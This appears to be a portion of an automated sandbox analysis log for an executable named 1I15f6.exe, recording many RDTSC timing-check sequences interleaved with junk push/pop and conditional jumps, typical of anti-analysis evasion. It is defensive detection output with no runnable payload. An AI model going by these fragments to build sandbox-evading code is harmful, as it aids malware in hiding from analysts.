                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91AE54 second address: 91AE5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91AE5A second address: 91AE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C45142A0h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91AE6E second address: 91AE8D instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1C54A6E96h 0x00000008 jns 00007FA1C54A6E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007FA1C54A6E9Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91AE8D second address: 91AE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jo 00007FA1C451429Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91AE9D second address: 91AEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA1C54A6EA2h 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91AEB7 second address: 91AECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91B075 second address: 91B07F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA1C54A6E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91B1FD second address: 91B201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91B4F1 second address: 91B518 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FA1C54A6E96h 0x00000009 jmp 00007FA1C54A6EA6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91B518 second address: 91B54E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A5h 0x00000007 jmp 00007FA1C45142A3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FA1C4514296h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91B54E second address: 91B55B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1C54A6E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 91B55B second address: 91B561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 920AF5 second address: 920AFF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA1C54A6E96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 920AFF second address: 920B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA1C4514296h 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 920F02 second address: 920F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 920F06 second address: 920F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CEDCE second address: 8CEDE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA1C54A6E98h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007FA1C54A6E96h 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CEDE8 second address: 8CEDF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8CEDF6 second address: 8CEE73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+1244C5BCh], esi 0x00000011 mov ebx, dword ptr [ebp+12482E66h] 0x00000017 call 00007FA1C54A6EA8h 0x0000001c xor dword ptr [ebp+122D245Ah], edi 0x00000022 pop edx 0x00000023 add eax, ebx 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FA1C54A6E98h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f push eax 0x00000040 pushad 0x00000041 pushad 0x00000042 push ebx 0x00000043 pop ebx 0x00000044 push edi 0x00000045 pop edi 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FA1C54A6EA7h 0x0000004e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9211DE second address: 9211E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9211E2 second address: 921201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA1C54A6E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA1C54A6EA3h 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 921201 second address: 921223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1C451429Dh 0x00000008 jg 00007FA1C4514296h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 ja 00007FA1C4514296h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 925006 second address: 925031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA1C54A6EA1h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 925177 second address: 92519F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA1C45142A7h 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9252FC second address: 925337 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1C54A6EA2h 0x00000008 jmp 00007FA1C54A6E9Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA1C54A6EA1h 0x00000017 jg 00007FA1C54A6E96h 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9255F2 second address: 9255F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9258CF second address: 9258E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FA1C54A6E96h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9258E8 second address: 9258EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 92C016 second address: 92C034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jnl 00007FA1C54A6E96h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA1C54A6E9Eh 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 92C61B second address: 92C62B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1C4514296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 92CF26 second address: 92CF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 92CF2A second address: 92CF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 92CF2E second address: 92CF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jp 00007FA1C54A6E96h 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007FA1C54A6E96h 0x00000016 popad 0x00000017 jmp 00007FA1C54A6EA1h 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FA1C54A6E9Bh 0x00000024 push esi 0x00000025 pop esi 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FA1C54A6E9Bh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 92CF76 second address: 92CF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 92CF7A second address: 92CF80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 935D8E second address: 935DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FA1C45142A2h 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9361C0 second address: 9361C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 936644 second address: 936648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9367D3 second address: 9367DD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1C54A6E96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 938007 second address: 938014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FA1C451429Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94026B second address: 94028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007FA1C54A6EAEh 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94028E second address: 940295 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9403D6 second address: 940412 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1C54A6E96h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA1C54A6EA5h 0x00000011 pushad 0x00000012 jmp 00007FA1C54A6EA8h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 940412 second address: 94042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C45142A1h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 940F1E second address: 940F3B instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1C54A6E96h 0x00000008 jno 00007FA1C54A6E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FA1C54A6E9Dh 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 940F3B second address: 940F45 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1C451429Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 93FE50 second address: 93FE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 946898 second address: 9468A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA1C4514296h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9468A2 second address: 9468F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA7h 0x00000007 jmp 00007FA1C54A6EA6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA1C54A6EA2h 0x00000015 jmp 00007FA1C54A6E9Bh 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9468F2 second address: 94691B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA1C4514296h 0x00000008 jne 00007FA1C4514296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edi 0x00000014 jnc 00007FA1C451429Eh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94691B second address: 946920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B8FD second address: 94B903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B903 second address: 94B90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA1C54A6E96h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B90D second address: 94B91B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA1C451429Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B91B second address: 94B933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA1C54A6E9Eh 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B933 second address: 94B937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B937 second address: 94B946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FA1C54A6E96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B946 second address: 94B94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B25E second address: 94B277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C54A6EA4h 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B277 second address: 94B294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A8h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B405 second address: 94B40D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B5AA second address: 94B5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B5AE second address: 94B5CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B5CD second address: 94B5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C45142A2h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B5EB second address: 94B604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA1C54A6EA0h 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 94B604 second address: 94B608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 95811E second address: 95813B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA8h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 95DF2A second address: 95DF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 95E0B0 second address: 95E0BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA1C54A6E96h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 95E0BA second address: 95E0C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FA1C4514296h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 96CE08 second address: 96CE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 96CE0E second address: 96CE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 96CE16 second address: 96CE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 je 00007FA1C54A6E9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 976197 second address: 9761A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9761A0 second address: 9761B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9761B8 second address: 9761BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9761BC second address: 9761D2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1C54A6E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 97647A second address: 97647E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 9768C9 second address: 9768CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 976B7B second address: 976B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 976B7F second address: 976B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA1C54A6E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 976B8B second address: 976B9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA1C451429Ch 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 976B9F second address: 976BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C54A6EA5h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 97B008 second address: 97B012 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA1C4514296h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
